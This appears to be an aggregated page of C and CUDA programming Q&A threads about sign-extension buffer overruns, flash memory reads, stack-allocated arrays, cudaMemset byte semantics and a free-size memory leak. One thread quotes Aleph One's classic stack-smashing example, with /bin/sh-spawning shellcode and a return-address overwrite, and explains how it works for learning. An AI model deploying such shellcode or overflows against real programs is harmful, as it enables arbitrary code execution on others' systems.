Buffer overrun issue reported by static code analysis tool

Buffer overrun issue reported by static code analysis tool - c

My piece of code:
void temp(char *source)
{
char dest[41];
for(int i = 0; i < 20; i++)
{
sprintf(&dest[i*2], "%02x", (unsigned int)source[i]);
}
}
When I run the static code analysis tool, I get the warning below:
On 19th iteration of the loop : This code could write past the end of the buffer pointed to by &dest[i * 2]. &dest[i * 2] evaluates to [dest + 38]. sprintf() writes up to 9 bytes starting at offset 38 from the beginning of the buffer pointed to by &dest[i * 2], whose capacity is
41 bytes.The number of bytes written could exceed the number of allocated bytes beyond that offset. The overrun occurs in stack memory.
My question is: since in every loop iteration, we are only copying 2 bytes (considering size of unsigned int on the machine is 2 bytes) from source to destination, where is the possibility of copying 9 bytes on the last iteration?

char can be signed, and is so by default in x86 compilers. On my computer
#include <stdio.h>
int main(void) {
printf("%02x\n", (unsigned int)(char)128);
}
prints ffffff80.
What you want to do is use format "%02hhx" and argument (unsigned char)c.

Related

C: Read values of entire flash memory of MCU

I want to read the values of the memory locations of the entire program flash memory of an MCU, in particular, the CC2538 on the OpenMote-CC2538. The read values are then computed into, currently, a large sum of all the values.
At this moment, I have the following code working to traverse the memory and get the values
uint64_t readMemory() {
unsigned char * bytes = (char *) 0x200000;
size_t size = 0x0007FFD4;
size_t i;
uint64_t amount = 0;
for (i = 0; i < size; i++) {
amount += bytes[i];
}
return amount;
}
uint64_t readFlashMemory() {
unsigned int * bytes = (int *) 0x200000;
size_t size = 0x0007FFD4;
size_t i;
uint64_t amount = 0;
for (i = 0; i < size; i+=4) {
amount += FlashGet(bytes);
bytes++;
}
return amount;
}
address 0x200000 and its size is 0x0007FFD4. The first function works with a char and goes to each address one by one, while the second one uses an existing function FlashGet(uint32_t) from the flash.c file, which is a direct access to a register (HWREG).
FlashGet requires a uint32_t address and returns a uint32_t value, as such it has a length of 4 and the address should be moved with 4 in the loop .The first function uses char for the addressing, which is a length of 1 and so the address should also move by 1 in the loop. Am I correct in these statements? If so, am I executing them correctly? For the second function, incrementing the pointer with 1 should move it with 4 due to it being of type uint32_t (similar to int).
However, the functions return a different value.
The first one returns: 674426297757
The second one returns: 8213668631160
As both functions should be doing the same, one or both must be incorrect and is not reading the entire program flash memory.
How can I fix both functions? Is there a better or easier way to read the entire memory when you have the starting address and size?

Consider you have a 4-byte flash memory with content
00 01 02 03
Adding by byte values will give you 0x000000000000006
Adding by 32-bit int values will give you 0x0000000003020100 assuming little-endian.

Understanding Aleph One's first buffer overflow exploit

I am reading "Smashing The Stack For Fun And Profit" by Aleph one, and reached this spot:
overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
Now, I understand all the theory behind the exploit:
the shellcode[] is in the data segment (which is writable), and contains the code to spawn a shell.
We would like to copy its content to main's buffer, in addition to overwrite main's return address to the beginning of the buffer (so that the execution control will be of our "spawning a shell" code. We do it by coping the shellcode to the large_string[] buffer (second for-loop), and the rest(???) of large_sting[] will contain the buffer's address (first for-loop).
Of course, main's return address will be overwritten by this buffer's address, since we copy large_string[] to buffer[] (strcpy).
My problem is with the little details of the exploit:
1.)
Why does the first for-loop is from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
2.)
What is srlen(shellcode)?
I would some clearing on that kind of stuff.
Thanks!

1) Why does the first for-loop is from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
It copies four bytes at a time (it relies on knowing that sizeof(int) is 4 on the target platform), and 32 * 4 == 128.
2) What is srlen(shellcode)?
It's the number of bytes in shellcode (this relies on the fact that shellcode does not contain embedded \0 characters).

Sieve of Eratosthenes : SIGSEGV?

I have written the code for the sieve but the program runs for only array size less than or equal to 1000000. For the rest of the cases which are larger, a simple SIGSEGV occurs. Can this be made to run cases > 1000000. Or where am I wrong?
#include <stdio.h>
int main()
{
unsigned long long int arr[10000001] = {[0 ... 10000000] = 0};
unsigned long long int c=0,i,j,a,b;
scanf("%llu%llu",&a,&b);
for(i=2;i<=b;i++)
if(arr[i] == 0)
for(j=2*i;j<=b;j+=i)
arr[j] = 1;
for(i=(a>2)?a:2;i<=b;i++)
if(arr[i] == 0)``
c++;
printf("%llu",c);
return 0;
}

This line allocates memory on the stack (which is a limited resource)
unsigned long long int arr[10000001] = {[0 ... 10000000] = 0};
If you are allocating 10,000,000 entries at 4 bytes each, that is 40 million bytes, which will be more than your stack can handle.
(or, on your platform, there is a good chance that a long-long-int is 8 or more bytes, indicating 80 million bytes in use!)
Instead, allocate the memory from the heap, which is much more plentiful:
int* arr = malloc(10,000,000 * sizeof(int)); // commas for clarity only. Remove in real code!
Or, if you want the memory initialized to zero, use calloc.
Then at the end of your program be sure you also free it:
free(arr);
PS The syntax {[0 ... 10000000] = 0}; is needlessly verbose.
To initialize an array to zero, simply:
int arr[100] = {0}; // Thats all!

You declared an array that can hold 10000001 items; if you want to handle larger numbers, you need a bigger array. I'm mildly surprised that it works for 1000000 already - that's a lot of stack space to be using.
Edit: sorry - didn't notice you had a different number of zeroes there. Don't use the stack to allocate your array and you should be fine. Just add static to the array declaration and you'll probably be okay.

Strange behaviour of an elementary CUDA code.

I am having trouble understanding the output of the following simple CUDA code. All that the code does is allocate two integer arrays: one on the host and one on the device each of size 16. It then sets the device array elements to the integer value 3 and then copies these values into the host_array where all the elements are then printed out.
#include <stdlib.h>
#include <stdio.h>
int main(void)
{
int num_elements = 16;
int num_bytes = num_elements * sizeof(int);
int *device_array = 0;
int *host_array = 0;
// malloc host memory
host_array = (int*)malloc(num_bytes);
// cudaMalloc device memory
cudaMalloc((void**)&device_array, num_bytes);
// Constant out the device array with cudaMemset
cudaMemset(device_array, 3, num_bytes);
// copy the contents of the device array to the host
cudaMemcpy(host_array, device_array, num_bytes, cudaMemcpyDeviceToHost);
// print out the result element by element
for(int i = 0; i < num_elements; ++i)
printf("%i\n", *(host_array+i));
// use free to deallocate the host array
free(host_array);
// use cudaFree to deallocate the device array
cudaFree(device_array);
return 0;
}
The output of this program is 50529027 printed line by line 16 times.
50529027
50529027
50529027
..
..
..
50529027
50529027
Where did this number come from? When I replace 3 with 0 in the cudaMemset call then I get correct behaviour. i.e.
0 printed line by line 16 times.
I compiled the code with nvcc test.cu on Ubuntu 10.10 with CUDA 4.0

I'm no cuda expert but 50529027 is 0x03030303 in hex. This means cudaMemset sets each byte in the array to 3 and not each int. This is not surprising given the signature of cuda memset (to pass in the number of bytes to set) and the general semantics of memset operations.
Edit: As to your (I guess) implicit question of how to achieve what you intended I think you have to write a loop and initialize each array element.

As others have pointed out, cudaMesetworks like the standard C memset- it sets byte values. From the CUDA documentation:
cudaError_t cudaMemset( void * devPtr, int value, size_t count)
Fills the first count bytes of the memory area pointed to by devPtr
with the constant byte value value.
If you want to set word size values, the best solution is to use your own memset kernel, perhaps something like this:
template<typename T>
__global__ void myMemset(T * x, T value, size_t count )
{
size_t tid = threadIdx.x + blockIdx.x * blockDim.x;
size_t stride = blockDim.x * gridDim.x;
for(int i=tid; i<count; i+=stride) {
x[i] = value;
}
}
which could be launched with enough blocks to cover the number of MP in your GPU, and each thread will do as many iterations as required to fill the memory allocation. Writes will be coalesced, so performance shouldn't be too bad. This could also be adapted to CUDA's vector types, if you so desired.

memset sets bytes, and integer is 4 bytes.. so what you get is 50529027 decimal, which is 0x3030303 in hex... In other words - you are using it wrong, and it has nothing to do with CUDA.

This is a classic memset shortcoming; it works only on data type with 8-bit size i.e char. This means it sets (probably) 3 to every 8-bits of the total memory. You can confirm this by a simple C++ code:
int main ()
{
int x=16;
size_t bytes = x*sizeof(int);
int *M = (int*)malloc(bytes);
memset(M,3,bytes);
for (int i = 0; i < x; ++i) {
printf("%d\n", M[i]);
}
return 0;
}
The only case in which memset works on all data types is when you set it to 0. (it sets every byte to 0 and hence all data to 0). If you change the data type to char, you'll see the desired output. cudaMemset is ditto copy of memset with the only difference that it takes a GPU pointer in input.
So memset or cudaMemset probably sets every byte to the integer value (in your case 3) of whole memory space defined by the third argument regardless of the datatype.
Tip:
Google: 50529027 in binary and you'll get the answer :)

Memory loss in following code when the CPU is 32 bit processor

I have a function to convert integer to string .The function is
char * Int_String(int Number)
{
char* result;
NAT size = 1;
if (Number > 9) {
size = (NAT)log10((double) Number) + 1;
} else if (Number < 0) {
size = (NAT)log10((double) abs(Number)) + 2; /* including '-' */
}
size++; /* for '\0' */
result = (char *) memory_Malloc(sizeof(char) * size);
sprintf(result, "%d", Number);
return result;
}
NAT is typedef unsigned int
Number is int
I am using this function in the following manner
char *s2;
char **Connections;
Connections = memory_Malloc(nc*sizeof(char*));
char con[]="c_";
k1=1;
for (i=0; i<nc ; i++){
s2 = Int_ToString(k1);
Connections[i]= string_Conc(con,s2);
string_StringFree(s2);
k1= k1+1;
}
And the functionschar* string_Conc(const char *s1, const char *S2) is
{
char* dst;
dst = memory_Malloc(strlen(s1) + strlen(s2) + 1);
strcpy(dst, s1);
return strcat(dst,s2);
}
I am using following methods to free its memory:
for(i=0; i<nc; i++){
memory_Free(Connections[i],sizeof(char));
}
memory_Free(Connections,nc*sizeof(char*));
The problem that i am getting is: i can free all the allocated memory when nc<=9.But when it is >=10 leakes memory in the multiple of 4 bytes with each increase in number. How can I remove the problem.Any help will be appreciated.
EDIT
void memory_Free(POINTER Freepointer, unsigned int Size)
Thanks,
thetna

You don't show the implementation of memory_Free (neither memory_Malloc), so we don't know why you need to pass the supposed size of the memory block to be freed as a 2nd parameter (the standard free() doesn't need this). However, here
memory_Free(Connections[i],sizeof(char));
it is certainly wrong: sizeof(char) is 1 on most platforms, but the size of the allocated block is at least 4 bytes for each string in the array (as the strings contain "c_" plus at least one digit plus the terminating '\0').
Update
Looking through the source code you linked, this indeed seems to be the cause of your problem! The code inside memory_Free seems to align memory block sizes - I can assume that to 4-byte boundaries, which is very common. In this case, if the passed Size is 1, it happens to be corrected to 4 - exactly the right value in case of single digit numbers as shown above! However, numbers greater than 9 are converted to (at least) two digits, thus the size of the converted string is already 5. A block of 5 bytes is most probably allocated as an aligned block of 8 bytes under the hood - but since memory_Free is always called with a Size of 1, it always frees only 4 bytes. This leaves 4 bytes leaking per each number above 9, precisely as you described in your comment above!
To fix this, you need to modify the line above to
memory_Free(Connections[i], strlen(Connections[i]) + 1);